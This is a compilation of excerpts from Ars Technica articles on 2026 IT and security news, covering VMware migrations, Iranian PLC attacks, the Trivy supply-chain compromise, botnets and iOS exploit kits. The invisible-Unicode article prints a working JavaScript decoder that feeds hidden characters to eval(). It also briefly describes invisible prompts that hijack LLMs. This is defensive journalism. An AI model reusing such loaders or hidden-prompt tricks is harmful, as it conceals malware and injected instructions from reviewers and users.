Amid customer dissatisfaction around Broadcom’s VMware takeover, rivals have been trying to lure customers from the leading virtualization firm. One of VMware’s biggest competitors, Nutanix, claims to have swiped tens of thousands of VMware customers.

Speaking at a press briefing at Nutanix’s .NEXT conference in Chicago this week, Nutanix CEO Rajiv Ramaswami said that “about 30,000 customers” have migrated from VMware to the rival platform, pointing to customer disapproval over Broadcom’s VMware strategy, SDxCentral, a London-based IT publication, reported today.

“I think there’s no doubt that the customer sentiment continues to be negative about Broadcom,” Ramaswami said, per SDxCentral.

Since Broadcom acquired VMware in November 2023, numerous VMware users have sought to reduce or end their reliance on VMware technologies. The most common drivers for migrations are that VMware is getting too expensive; users are being forced to bundle products; the company ended perpetual licenses; and VMware has become harder to work with after Broadcom culled channel partners.

Broadcom’s strategy has made VMware unaffordable or impractical for most small- to medium-size businesses (SMBs) and narrowed VMware’s focus to enterprise-size customers.

Nutanix hasn’t specified how many of the customers that it got from VMware are SMBs or enterprise-sized; although, adoption is said to be strongest among mid-market customers as Nutanix also tries wooing larger customers, often by starting with partial deployments.

During this week’s press briefing, Ramaswami reportedly said that some of the customers that moved from VMware to Nutanix during the latter’s most recent fiscal quarter represented Nutanix’s “strongest quarterly new logo additions in eight years.”

“Most of the logos came from our typical VMware migrations on to the [hyperconverged infrastructure] platform,” he said.

During the Nutanix conference, Brandon Shaw, Nutanix VP and head of technology services, said that Western Union has been migrating from VMware to Nutanix for six months, The Register reported. The financial services company is moving 900 to 1,200 applications across 3,900 cores.

Shaw said that Western Union has been exploring new IT suppliers to help it become more customer-focused. Despite Broadcom’s history of “decent lines of communication” with Western Union, Shaw said that Western Union had “challenges partnering with them.”

https://arstechnica.com/information-technology/2026/04/nutanix-claims-it-has-poached-30000-vmware-customers/

Hackers working on behalf of the Iranian government are disrupting operations at multiple US critical infrastructure sites, likely in response to the country’s ongoing war with the US, a half-dozen government agencies are warning.

In an advisory published Tuesday, the FBI, Cybersecurity and Infrastructure Security Agency, National Security Agency, Environmental Protection Agency, Department of Energy, and US Cyber Command “urgently” warned that the APT, or advanced persistent threat group, is targeting PLCs, short for programmable logic controllers. These devices, typically the size of a toaster, sit in factories, water treatment centers, oil refineries, and other industrial settings, often in remote locations. They provide an interface between computers used for automation and physical machinery.

Operational disruption and financial loss

“Since at least March 2026, the authoring agencies identified (through engagements with victim organizations) an Iranian-affiliated APT-group that disrupted the function of PLCs,” the advisory stated. “These PLCs were deployed across multiple US critical infrastructure sectors (including Government Services and Facilities, Waste Water Systems (WWS), and Energy sectors) within a wide variety of industrial automation processes. Some of the victims experienced operational disruption and financial loss.”

Among the PLCs being compromised or targeted are those made by Rockwell Automation/Allen-Bradley. Security firm Censys said Wednesday that an Internet scan it performed identified 5,219 such devices exposed to the Internet. A full 75 percent of them were located in the US and likely in far-off locations where equipment is located. The infrastructure being used to target the devices is a “single multi-home Windows engineering workstation running the Rockwell tool chain.”

https://arstechnica.com/security/2026/04/iran-linked-hackers-disrupt-operations-at-us-critical-infrastructure-sites/

Hackers have compromised virtually all versions of Aqua Security’s widely used Trivy vulnerability scanner in an ongoing supply chain attack that could have wide-ranging consequences for developers and the organizations that use them.

Trivy maintainer Itay Shakury confirmed the compromise on Friday, following rumors and a thread, since deleted by the attackers, discussing the incident. The attack began in the early hours of Thursday. When it was done, the threat actor had used stolen credentials to force-push all but one of the trivy-action tags and seven setup-trivy tags to use malicious dependencies.

Assume your pipelines are compromised

A forced push is a git command that overrides a default safety mechanism that protects against overwriting existing commits. Trivy is a vulnerability scanner that developers use to detect vulnerabilities and inadvertently hardcoded authentication secrets in pipelines for developing and deploying software updates. The scanner has 33,200 stars on GitHub, a high rating that indicates it’s used widely.

“If you suspect you were running a compromised version, treat all pipeline secrets as compromised and rotate immediately,” Shakury wrote.

Security firms Socket and Wiz said that the malware, triggered in 75 compromised trivy-action tags, causes custom malware to thoroughly scour development pipelines, including developer machines, for GitHub tokens, cloud credentials, SSH keys, Kubernetes tokens, and whatever other secrets may live there. Once found, the malware encrypts the data and sends it to an attacker-controlled server.

The end result, Socket said, is that any CI/CD pipeline using software that references compromised version tags executes code as soon as the Trivy scan is run. Spoofed version tags include the widely used @0.34.2, @0.33, and @0.18.0. Version @0.35.0 appears to be the only one unaffected.

https://arstechnica.com/security/2026/03/widely-used-trivy-scanner-compromised-in-ongoing-supply-chain-attack/

“In January 2026 Broadcom signaled the termination of its VMware Cloud Service Provider program in Europe,” CIPSE said in a statement. This unilateral decision ​removed all but a tiny minority of hand-selected partners and ​excluded most European CSPs from selling VMware products.”

In its complaint, CISPE also accused Broadcom of “ongoing abuse,” citing sharp price hikes—up to tenfold, with some customers reporting as much as 900 percent increases—along with product bundling and commitment requirements based on projected rather than actual use, The Register reported.

“After imposing outrageous and unjustified price hikes immediately following the acquisition of VMware, Broadcom is now applying the ‘coup de grâce.’ We need urgent intervention to force them to change,” CISPE Secretary General Francisco Mingorance said, according to the publication.

In a statement responding to CISPE’s antitrust complaint, Broadcom said:

Broadcom strongly disagrees with the allegations by CISPE, an organization funded by hyperscalers, which misrepresent the realities of the market. We continue to be committed to investing significantly in our European VMware Cloud Service Provider partners… helping them offer alternatives to the hyperscalers and meet the evolving needs of European businesses and organizations.

CISPE currently has 50 members. It also names hyperscalers Amazon Web Services and Microsoft as “adherent members,” which CISPE claims don’t have voting rights and are prohibited from participating in certain activities.

In July, CISPE filed an appeal with the European General Court in an attempt to annul the EC’s approval of Broadcom’s VMware acquisition. That case is ongoing.

https://arstechnica.com/information-technology/2026/03/cloud-service-providers-ask-eu-regulator-to-reinstate-vmware-partner-program/

The problem is that agencies often lack the staff and resources to do thorough reviews, which means the whole system is leaning on the claims of the cloud companies and the assessments of the third-party firms they pay to evaluate them. Under the current vision, critics say, FedRAMP has lost the plot.

“FedRAMP’s job is to watch the American people’s back when it comes to sharing their data with cloud companies,” said Mill, the former GSA official, who also co-authored the 2024 White House memo. “When there’s a security issue, the public doesn’t expect FedRAMP to say they’re just a paper-pusher.”

Meanwhile, at the Justice Department, officials are finding out what FedRAMP meant by the “unknown unknowns” in GCC High. Last year, for example, they discovered that Microsoft relied on China-based engineers to service their sensitive cloud systems despite the department’s prohibition against non-US citizens assisting with IT maintenance.

Officials learned about this arrangement—which was also used in GCC High—not from FedRAMP or from Microsoft but from a ProPublica investigation into the practice, according to the Justice employee who spoke with us.

A Microsoft spokesperson acknowledged that the written security plan for GCC High that the company submitted to the Justice Department did not mention foreign engineers, though he said Microsoft did communicate that information to Justice officials before 2020. Nevertheless, Microsoft has since ended its use of China-based engineers in government systems.

Former and current government officials worry about what other risks may be lurking in GCC High and beyond.

The GSA told ProPublica that, in general, “if there is credible evidence that a cloud service provider has made materially false representations, that matter is then appropriately referred to investigative authorities.”

Ironically, the ultimate arbiter of whether cloud providers or their third-party assessors are living up to their claims is the Justice Department itself. The recent indictment of the former Accenture employee suggests it is willing to use this power. In a court document, the Justice Department alleges that the ex-employee made “false and misleading representations” about the cloud platform’s security to help the company “obtain and maintain lucrative federal contracts.” She is also accused of trying to “influence and obstruct” Accenture’s third-party assessors by hiding the product’s deficiencies and telling others to conceal the “true state of the system” during demonstrations, the department said. She has pleaded not guilty.

There is no public indication that such a case has been brought against Microsoft or anyone involved in the GCC High authorization. The Justice Department declined to comment. Monaco, the deputy attorney general who launched the department’s initiative to pursue cybersecurity fraud cases, did not respond to requests for comment.

She left her government position in January 2025. Microsoft hired her to become its president of global affairs.

A company spokesperson said Monaco’s hiring complied with “all rules, regulations, and ethical standards” and that she “does not work on any federal government contracts or have oversight over or involvement with any of our dealings with the federal government.”

This story originally appeared on ProPublica. ProPublica is a Pulitzer Prize-winning investigative newsroom. Sign up for The Big Story newsletter to receive stories like this one in your inbox.

https://arstechnica.com/information-technology/2026/03/federal-cyber-experts-called-microsofts-cloud-a-pile-of-shit-approved-it-anyway/

Researchers are warning about the risks posed by a low-cost device that can give insiders and hackers unusually broad powers in compromising networks.

The devices, which typically sell for $30 to $100, are known as IP KVMs. Administrators often use them to remotely access machines on networks. The devices, not much bigger than a deck of cards, allow the machines to be accessed at the BIOS/UEFI level, the firmware that runs before the loading of the operating system.

This provides power and convenience to admins, but in the wrong hands, the capabilities can often torpedo what might otherwise be a secure network. Risks are posed when the devices—which are exposed to the Internet—are deployed with weak security configurations or surreptitiously connected to by insiders. Firmware vulnerabilities also leave them open to remote takeover.

No exotic zero-days here

On Tuesday, researchers from security firm Eclypsium disclosed a total of nine vulnerabilities in IP KVMs from four manufacturers. The most severe flaws allow unauthenticated hackers to gain root access or run malicious code on them.

“These are not exotic zero-days requiring months of reverse engineering,” Eclypsium researchers Paul Asadoorian and Reynaldo Vasquez Garcia wrote. “These are fundamental security controls that any networked device should implement. Input validation. Authentication. Cryptographic verification. Rate limiting. We are looking at the same class of failures that plagued early IoT devices a decade ago, but now on a device class that provides the equivalent of physical access to everything it connects to.”

https://arstechnica.com/security/2026/03/researchers-disclose-vulnerabilities-in-ip-kvms-from-4-manufacturers/

The invisible code is rendered with Public Use Areas (sometimes called Public Use Access), which are ranges in the Unicode specification for special characters reserved for private use in defining emojis, flags, and other symbols. The code points represent every letter of the US alphabet when fed to computers, but their output is completely invisible to humans. People reviewing code or using static analysis tools see only whitespace or blank lines. To a JavaScript interpreter, the code points translate into executable code.

The invisible Unicode characters were devised decades ago and then largely forgotten. That is, until 2024, when hackers began using the characters to conceal malicious prompts fed to AI engines. While the text was invisible to humans and text scanners, LLMs had little trouble reading them and following the malicious instructions they conveyed. AI engines have since devised guardrails that are designed to restrict usage of the characters, but such defenses are periodically overridden.

Since then, the Unicode technique has been used in more traditional malware attacks. In one of the packages Aikido analyzed in Friday’s post, the attackers encoded a malicious payload using the invisible characters. Inspection of the code shows nothing. During the JavaScript runtime, however, a small decoder extracts the real bytes and passes them to the eval() function.

const s = v => [...v].map(w => ( w = w.codePointAt(0), w >= 0xFE00 && w <= 0xFE0F ? w - 0xFE00 : w >= 0xE0100 && w <= 0xE01EF ? w - 0xE0100 + 16 : null
)).filter(n => n !== null); 
eval(Buffer.from(s(``)).toString('utf-8'));

“The backtick string passed to s() looks empty in every viewer, but it’s packed with invisible characters that, once decoded, produce a full malicious payload,” Aikido explained. “In past incidents, that decoded payload fetched and executed a second-stage script using Solana as a delivery channel, capable of stealing tokens, credentials, and secrets.”

Since finding the new round of packages on GitHub, the researchers have found similar ones on npm and the VS Code marketplace. Aikido said the 151 packages detected are likely a small fraction spread across the campaign because many have been deleted since first being uploaded.

The best way to protect against the scourge of supply-chain attacks is to carefully inspect packages and their dependencies before incorporating them into projects. This includes scrutinizing package names and searching for typos. If suspicions about LLM use are correct, malicious packages may increasingly appear to be legitimate, particularly when invisible unicode characters are encoding malicious payloads.

https://arstechnica.com/security/2026/03/supply-chain-attack-using-invisible-code-hits-github-and-other-repositories/

What else is known about Handala Hack?

The group has existed since at least 2023. It takes its name from a character in the political cartoons of Palestinian artist Naji al-Ali. The group’s logo depicts a small Palestinian boy who is a symbol associated with Palestinian resistance.

Check Point and other security firms have said Handala Hack is affiliated with Iran’s Ministry of Intelligence and Security and maintains multiple online personas. Compared to other nation-state-sponsored hacking groups, Handala Hack has kept a comparatively lower profile. Still, it has carried out a series of destructive wiping attacks and influence operations over the years.

Around the same time the Stryker attack came to light, posts to a Telegram account and website controlled by Handala Hack took credit for the takedown. Handala posts cited last week’s killing of 165 civilians at a girls’ school in Iran by an American Tomahawk missile and past hacking operations that the US and Israel have perpetrated on Iran.

What is the point of striking a corporation in retaliation for airstrikes carried out by the US and Israel?

Such actions are taken for their psychological effects, which are often disproportionately larger than the resources required to bring them about. With limited means for Iran to strike back militarily, the Stryker disruption allows an alternative means for the country and its allies to retaliate. The success is intended to demonstrate that pro-Iranian forces can still exact a price that has a material effect on large populations in the US, Israel, and countries allied with them.

As a major supplier of lifesaving medical devices relied on throughout the US and its allies, Stryker plays a strategic and symbolic role in their security, researchers at Flash Point said Thursday. “By operating behind a persona styled as a grassroots, pro-Palestinian resistance movement, Iranian state-nexus actors are able to conduct destructive cyber operations against Western organizations while maintaining a degree of plausible deniability.”

https://arstechnica.com/security/2026/03/whats-known-about-wiper-attack-on-stryker-a-major-supplier-of-lifesaving-devices/

Researchers say they have uncovered a takedown-resistant botnet of 14,000 routers and other network devices—primarily made by Asus—that have been conscripted into a proxy network that anonymously carries traffic used for cybercrime.

The malware—dubbed KadNap—takes hold by exploiting vulnerabilities that have gone unpatched by their owners, Chris Formosa, a researcher at security firm Lumen’s Black Lotus Labs, told Ars. The high concentration of Asus routers is likely due to botnet operators acquiring a reliable exploit for vulnerabilities affecting those models. He said it’s unlikely that the attackers are using any zero-days in the operation.

A botnet that stands out among others

The number of infected routers averages about 14,000 per day, up from 10,000 last August, when Black Lotus discovered the botnet. Compromised devices are overwhelmingly located in the US, with smaller populations in Taiwan, Hong Kong, and Russia. One of the most salient features of KadNap is a sophisticated peer-to-peer design based on Kademlia, a network structure that uses distributed hash tables to conceal the IP addresses of command-and-control servers. The design makes the botnet resistant to detection and takedowns through traditional methods.

“The KadNap botnet stands out among others that support anonymous proxies in its use of a peer-to-peer network for decentralized control,” Formosa and fellow Black Lotus researcher Steve Rudd wrote Wednesday. “Their intention is clear: avoid detection and make it difficult for defenders to protect against.”

Distributed hash tables have long been used to create hardened peer-to-peer networks, most notably BitTorrent and the Inter-Planetary File System. Rather than having one or more centralized servers that directly control nodes and provide them with the IP addresses of other nodes, DHTs allow any node to poll other nodes for the device or server it’s looking for. The decentralized structure and the substitution of IP addresses with hashes give the network resilience against takedowns or denial of service attacks.

https://arstechnica.com/security/2026/03/14000-routers-are-infected-by-malware-thats-highly-resistant-to-takedowns/

Coruna is also notable for its use by three distinct hacking groups. Google first detected its use in February of last year in an operation conducted by a “customer of a surveillance vendor.” The vulnerability exploited, tracked as CVE-2025-23222, had been patched 13 months earlier. In July 2025, a “suspected Russian espionage group” exploited CVE-2023-43000 in attacks planted on websites that were frequented by Ukrainian targets. Last December, when it was used by a “financially motivated threat actor from China,” Google was able to retrieve the complete exploit kit.

“How this proliferation occurred is unclear, but suggests an active market for ‘second hand’ zero-day exploits,” Google wrote. “Beyond these identified exploits, multiple threat actors have now acquired advanced exploitation techniques that can be re-used and modified with newly identified vulnerabilities.”

Google researchers went on to write:

We retrieved all the obfuscated exploits, including ending payloads. Upon further analysis, we noticed an instance where the actor deployed the debug version of the exploit kit, leaving in the clear all of the exploits, including their internal code names. That’s when we learned that the exploit kit was likely named Coruna internally. In total, we collected a few hundred samples covering a total of five full iOS exploit chains. The exploit kit is able to target various iPhone models running iOS version 13.0 (released in September 2019) up to version 17.2.1 (released in December 2023).

The 23 exploits, along with the code names and other information, are:

CISA is adding only three of the CVEs to its catalog. They are:

• CVE-2021-30952 Apple Multiple Products Integer Overflow or Wraparound Vulnerability
• CVE-2023-41974 Apple iOS and iPadOS Use-After-Free Vulnerability
• CVE-2023-43000 Apple Multiple products Use-After-Free Vulnerability

CISA is directing agencies to “apply mitigations per vendor instructions, follow applicable… guidance for cloud services, or discontinue use of the product if mitigations are unavailable.” The agency went on to warn: “These types of vulnerabilities are frequent attack vectors for malicious cyber actors and pose significant risks to the federal enterprise.”

https://arstechnica.com/security/2026/03/cisa-adds-3-ios-flaws-to-its-catalog-of-known-exploited-vulnerabilities/